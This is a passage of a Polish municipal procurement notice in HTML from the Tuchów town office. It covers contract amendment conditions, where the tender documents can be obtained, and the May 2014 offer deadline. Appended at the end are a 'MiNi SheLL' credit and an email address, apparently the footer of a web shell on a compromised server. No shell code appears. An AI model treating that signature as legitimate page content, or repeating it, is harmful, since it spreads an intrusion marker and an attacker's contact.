3.wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) - w zakresie dostosowania umowy do zmian nią spowodowanych;
4.wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów, w zakresie dostosowania do celu zmiany;
5.wydłużenie terminu wykonania przedmiotu umowy, o ile nie będą wynikać z przyczyn leżących po stronie Wykonawcy - w zakresie dostosowania umowy do tych zmian;
6.zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, które nie były możliwe do przewidzenia w chwili zawarcia umowy - w zakresie dostosowania umowy do zmian nią spowodowanych;
3)  Zmiany powyższe nie mogą wpływać na zwiększenie ceny realizacji zamówienia przyjętej przez Zamawiającego w wyniku rozstrzygnięcia przetargu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow/Zamówienia  publiczne+ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33-170 Tuchów ul. Jana Pawła II 4, pokój nr 25. Cena materiałów przetargowych jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2014 godzina 10:00, miejsce: Oferty należy złożyć w dwóch kopertach, w siedzibie Zamawiającego w Tuchowie ul. Rynek 1, Pokój nr 7, Biuro Obsługi Klienta do dnia 21.05.2014 r. do godz. 10.00.
Otwarcie ofert - godz. 10.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com